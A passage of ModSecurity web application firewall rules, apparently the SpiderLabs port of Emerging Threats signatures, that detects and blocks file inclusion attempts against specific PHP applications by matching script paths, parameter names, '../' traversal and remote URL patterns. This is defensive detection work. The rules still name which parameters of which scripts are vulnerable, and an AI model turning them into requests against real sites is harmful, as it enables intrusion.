"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003694,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS NoAH Remote Inclusion Attempt -- mfa_theme.php tpls',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3861'" SecRule REQUEST_LINE "@contains tpls[" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS NoAH Remote Inclusion Attempt -- mfa_theme.php tpls',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009728) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS NotFTP config.php languages Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /config.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009728,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS NotFTP config.php languages Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34636'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains newlang=kacper" "chain" SecRule ARGS:languages[kacper][file] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS NotFTP config.php languages Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010355) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS OBOphiX fonctions_racine.php chemin_lib parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /fonctions_racine.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010355,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS OBOphiX fonctions_racine.php chemin_lib parameter Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule &TX:'/RFI.*ARGS:chemin_lib/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS OBOphiX fonctions_racine.php chemin_lib parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009332) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ODARS resource_categories_view.php CLASSES_ROOT parameter local file inclusion SecRule REQUEST_LINE "@contains /resource_categories_view.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009332,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS ODARS resource_categories_view.php CLASSES_ROOT parameter local file inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:CLASSES_ROOT "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ODARS resource_categories_view.php CLASSES_ROOT parameter local file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009333) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ODARS resource_categories_view.php CLASSES_ROOT parameter Remote file inclusion SecRule REQUEST_LINE "@contains /resource_categories_view.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009333,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS ODARS resource_categories_view.php CLASSES_ROOT parameter Remote file inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:CLASSES_ROOT/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ODARS resource_categories_view.php CLASSES_ROOT parameter Remote file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003741) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Open Translation Engine Remote Inclusion Attempt -- header.php ote_home SecRule REQUEST_LINE "@contains /skins/header.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003741,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Open Translation Engine Remote Inclusion Attempt -- header.php ote_home',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3838'" SecRule &TX:'/RFI.*ARGS:ote_home/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Open Translation Engine Remote Inclusion Attempt -- header.php ote_home',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009395) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS OTManager ADM_Pagina.php Tipo Remote File Inclusion SecRule REQUEST_LINE "@contains /ADM_Pagina.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009395,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS OTManager ADM_Pagina.php Tipo Remote File Inclusion',tag:'web-application-attack',tag:'cve,CVE-2008-5063'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:Tipo/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS OTManager ADM_Pagina.php Tipo Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009396) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS OTManager ADM_Pagina.php Tipo Local File Inclusion SecRule REQUEST_LINE "@contains /ADM_Pagina.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009396,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS OTManager ADM_Pagina.php Tipo Local File Inclusion',tag:'web-application-attack',tag:'cve,CVE-2008-5063'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:Tipo "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS OTManager ADM_Pagina.php Tipo Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009164) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS openEngine filepool.php oe_classpath parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /filepool.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009164,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS openEngine filepool.php oe_classpath parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,31423'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:oe_classpath/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS openEngine filepool.php oe_classpath parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009931) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible OpenSiteAdmin pageHeader.php Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /OpenSiteAdmin/pages/pageHeader.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009931,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Possible OpenSiteAdmin pageHeader.php Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.owasp.org/index.php/PHP_File_Inclusion'" SecRule QUERY_STRING|REQUEST_BODY "(?i:\x2Ephp\x3F.{0,300}\x3D(http\x3A|ftp\x3A|https\x3A|ftps\x3A))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible OpenSiteAdmin pageHeader.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011274) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS OpenX phpAdsNew phpAds_geoPlugin Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /libraries/lib-remotehost.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011274,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS OpenX phpAdsNew phpAds_geoPlugin Parameter Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:phpAds_geoPlugin/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS OpenX phpAdsNew phpAds_geoPlugin Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009459) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Orlando CMS classes init.php GLOBALS Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /modules/core/logger/init.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009459,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Orlando CMS classes init.php GLOBALS Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,29820'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:GLOBALS[preloc]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Orlando CMS classes init.php GLOBALS Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009460) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Orlando CMS newscat.php GLOBALS Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /newscat.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009460,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Orlando CMS newscat.php GLOBALS Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,29820'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:GLOBALS[preloc]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Orlando CMS newscat.php GLOBALS Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009461) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Orlando CMS init.php GLOBALS Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /modules/core/security/init.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009461,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Orlando CMS init.php GLOBALS Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,29820'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:GLOBALS[preloc] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Orlando CMS init.php GLOBALS Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009462) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Orlando CMS stage1.php GLOBALS Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /stage1.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009462,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Orlando CMS stage1.php GLOBALS Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,29820'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:GLOBALS[preloc] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Orlando CMS stage1.php GLOBALS Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009463) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Orlando CMS stage4.php GLOBALS Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /stage4.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009463,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Orlando CMS stage4.php GLOBALS Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,29820'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:GLOBALS[preloc] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Orlando CMS stage4.php GLOBALS Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009464) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Orlando CMS stage6.php GLOBALS Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /stage6.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009464,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Orlando CMS stage6.php GLOBALS Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,29820'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:GLOBALS[preloc] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Orlando CMS stage6.php GLOBALS Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009871) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPauction GPL converter.inc.php include_path Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /includes/converter.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009871,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS PHPauction GPL converter.inc.php include_path Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,28284'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:include_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPauction GPL converter.inc.php include_path Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009872) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPauction GPL messages.inc.php include_path Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /includes/messages.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009872,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS PHPauction GPL messages.inc.php include_path Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,28284'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:include_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPauction GPL messages.inc.php include_path Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009873) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPauction GPL settings.inc.php include_path Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /includes/settings.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009873,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS PHPauction GPL settings.inc.php include_path Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,28284'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:include_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPauction GPL settings.inc.php include_path Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003742) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPChess Remote Inclusion Attempt -- language.php config SecRule REQUEST_LINE "@contains /includes/language.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003742,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS PHPChess Remote Inclusion Attempt -- language.php config',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3837'" SecRule &TX:'/RFI.*ARGS:config/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPChess Remote Inclusion Attempt -- language.php config',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003743) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPChess Remote Inclusion Attempt -- layout_admin_cfg.php Root_Path SecRule REQUEST_LINE "@contains /layout_admin_cfg.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003743,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS PHPChess Remote Inclusion Attempt -- layout_admin_cfg.php Root_Path',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3837'" SecRule &TX:'/RFI.*ARGS:Root_Path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPChess Remote Inclusion Attempt -- layout_admin_cfg.php Root_Path',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003744) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPChess Remote Inclusion Attempt -- layout_cfg.php Root_Path SecRule REQUEST_LINE "@contains /layout_cfg.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003744,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS PHPChess Remote Inclusion Attempt -- layout_cfg.php Root_Path',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3837'" SecRule &TX:'/RFI.*ARGS:Root_Path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPChess Remote Inclusion Attempt -- layout_cfg.php Root_Path',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003745) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPChess Remote Inclusion Attempt -- layout_t_top.php Root_Path SecRule REQUEST_LINE "@contains /skins/phpchess/layout_t_top.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003745,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS PHPChess Remote Inclusion Attempt -- layout_t_top.php Root_Path',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3837'" SecRule &TX:'/RFI.*ARGS:Root_Path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPChess Remote Inclusion Attempt -- layout_t_top.php Root_Path',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009743) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpDatingClub website.php page Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /website.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009743,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS phpDatingClub website.php page Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,30176'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:page "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpDatingClub website.php page Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003372) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPEventMan remote file include SecRule REQUEST_LINE "@contains /controller/" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003372,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHPEventMan remote file include',tag:'web-application-attack',tag:'bugtraq,22358'" SecRule QUERY_STRING|REQUEST_BODY "(?i:(text\.ctrl\.php|common\.function\.php)\?level=\s*(ftps?|https?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPEventMan remote file include',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003740) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPFirstPost Remote Inclusion Attempt block.php Include SecRule REQUEST_LINE "@contains /block.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003740,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS PHPFirstPost Remote Inclusion Attempt block.php Include',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3906'" SecRule &TX:'/RFI.*ARGS:Include/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPFirstPost Remote Inclusion Attempt block.php Include',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010095) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPGenealogy CoupleDB.php DataDirectory Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /CoupleDB.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010095,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS PHPGenealogy CoupleDB.php DataDirectory Parameter Remote File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:DataDirectory/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPGenealogy CoupleDB.php DataDirectory Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003730) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPHtmlLib Remote Inclusion Attempt -- widget8.php phphtmllib SecRule REQUEST_LINE "@contains /examples/widget8.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003730,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS PHPHtmlLib Remote Inclusion Attempt -- widget8.php phphtmllib',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/467837/100/0/threaded'" SecRule &TX:'/RFI.*ARGS:phphtmllib/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPHtmlLib Remote Inclusion Attempt -- widget8.php phphtmllib',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003731) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPLojaFacil Remote Inclusion Attempt -- ftp.php path_local SecRule REQUEST_LINE "@contains /ftp.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003731,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS PHPLojaFacil Remote Inclusion Attempt -- ftp.php path_local',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3875'" SecRule &TX:'/RFI.*ARGS:path_local/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPLojaFacil Remote Inclusion Attempt -- ftp.php path_local',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003732) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPLojaFacil Remote Inclusion Attempt -- db.php path_local SecRule REQUEST_LINE "@contains /libs/db.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003732,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS PHPLojaFacil Remote Inclusion Attempt -- db.php path_local',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3875'" SecRule &TX:'/RFI.*ARGS:path_local/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPLojaFacil Remote Inclusion Attempt -- db.php path_local',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003733) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPLojaFacil Remote Inclusion Attempt -- libs_ftp.php path_local SecRule REQUEST_LINE "@contains /libs/ftp.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003733,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS PHPLojaFacil Remote Inclusion Attempt -- libs_ftp.php path_local',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3875'" SecRule &TX:'/RFI.*ARGS:path_local/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPLojaFacil Remote Inclusion Attempt -- libs_ftp.php path_local',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008961) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPmyGallery lang parameter Local File Inclusion SecRule REQUEST_LINE "@contains /_conf/core/common-tpl-vars.php" 